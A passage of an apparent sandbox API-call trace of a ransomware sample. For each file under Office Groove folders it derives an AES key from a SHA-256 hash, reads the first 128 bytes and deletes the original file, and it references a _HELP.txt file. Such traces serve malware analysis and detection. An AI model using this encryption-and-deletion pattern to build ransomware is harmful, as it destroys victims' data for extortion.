(normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsversion1warning.htm")) returned 1 [0165.664] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.664] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.664] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.664] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.665] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1499 [0165.665] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.668] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.668] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.668] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.669] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIcons.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewattachmenticons.jpg")) returned 1 [0165.671] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.671] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.671] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.671] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.671] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x638 [0165.671] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.690] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.690] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.690] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.693] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewAttachmentIconsMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewattachmenticonsmask.bmp")) returned 1 [0165.695] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.696] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.696] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.696] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.696] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfa1 [0165.696] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.699] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.699] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.699] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.702] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormsViewFrame.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formsviewframe.html")) returned 1 [0165.704] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.705] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.705] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.705] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.705] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x1bfb [0165.705] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.724] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.724] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.724] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.725] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FormToolImages.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\formtoolimages.jpg")) returned 1 [0165.727] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.727] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.727] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.727] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.727] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x167d1 [0165.727] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.752] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.752] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.752] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.753] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\GrooveFormsMetaData.xml" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\grooveformsmetadata.xml")) returned 1 [0165.755] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.756] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.756] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.756] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.756] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x33a [0165.756] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.790] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.790] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.790] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.792] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\menu_arrow.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\menu_arrow.gif")) returned 1 [0165.794] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.794] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.794] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.794] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.794] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x103f [0165.794] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.831] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.831] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.831] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.832] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\utilityfunctions.js")) returned 1 [0165.834] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.834] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.834] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.834] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.834] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x35d6 [0165.834] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.849] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.849] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.849] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.850] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\validation.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\validation.js")) returned 1 [0165.851] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.852] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.852] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.852] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.852] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x54 [0165.852] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x54, lpOverlapped=0x0) returned 1 [0165.853] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.853] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.853] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.855] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewDblClick.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewdblclick.js")) returned 1 [0165.856] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.857] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.857] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.857] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.857] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xd78 [0165.857] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.871] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.872] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.872] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.873] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\ViewHeaderPreview.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewheaderpreview.jpg")) returned 1 [0165.874] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.874] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.874] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.874] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.874] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xce [0165.874] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.876] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.876] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.876] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.877] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\viewSelectionChanged.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\viewselectionchanged.js")) returned 1 [0165.878] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.879] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.879] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.879] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.879] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xed [0165.879] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.879] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0165.879] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.879] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.881] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\_HELP.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\_help.txt")) returned 1 [0165.883] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0165.939] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.939] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.939] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.939] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.939] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xbe8 [0165.939] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0165.978] CryptDestroyHash (hHash=0x284d628) returned 1 [0165.978] CryptDestroyKey (hKey=0x284d668) returned 1 [0165.978] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0165.980] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrow.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\addtoviewarrow.jpg")) returned 1 [0165.981] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0165.982] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0165.982] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.982] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0165.982] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x924 [0165.982] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.140] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.140] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.140] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.141] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\AddToViewArrowMask.bmp" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\addtoviewarrowmask.bmp")) returned 1 [0166.143] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.143] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.143] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.143] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.143] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xae8 [0166.143] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.178] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.178] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.178] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.179] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\attention.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\attention.gif")) returned 1 [0166.180] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.180] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.181] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.181] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.181] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x161d [0166.181] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.183] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.183] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.183] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.184] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Casual.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_casual.gif")) returned 1 [0166.186] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.186] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.186] CryptHashData (hHash=0x284d628, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.186] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d628, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.186] GetFileSize (in: hFile=0x4e8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x7dd3 [0166.186] ReadFile (in: hFile=0x4e8, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.190] CryptDestroyHash (hHash=0x284d628) returned 1 [0166.190] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.190] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.191] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Country.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_country.gif")) returned 1 [0166.192] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x32689ac*=0xa52810) returned 1 [0166.193] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x32689b0 | out: phHash=0x32689b0) returned 1 [0166.193] CryptHashData (hHash=0x284d6a8, pbData=0x9ed790, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.193] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d6a8, dwFlags=0x0, phKey=0x32689a4 | out: phKey=0x32689a4*=0x284d668) returned 1 [0166.193] GetFileSize (in: hFile=0x4e4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x132a [0166.193] ReadFile (in: hFile=0x4e4, lpBuffer=0x3268a24, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x32689b4, lpOverlapped=0x0 | out: lpBuffer=0x3268a24*, lpNumberOfBytesRead=0x32689b4*=0x80, lpOverlapped=0x0) returned 1 [0166.204] CryptDestroyHash (hHash=0x284d6a8) returned 1 [0166.204] CryptDestroyKey (hKey=0x284d668) returned 1 [0166.204] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0166.205] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\bg_Earthy.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\bg_earthy.gif")) returned 1 [0166.207] CryptAcquireContextW (in: phProv=0x32689ac, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", 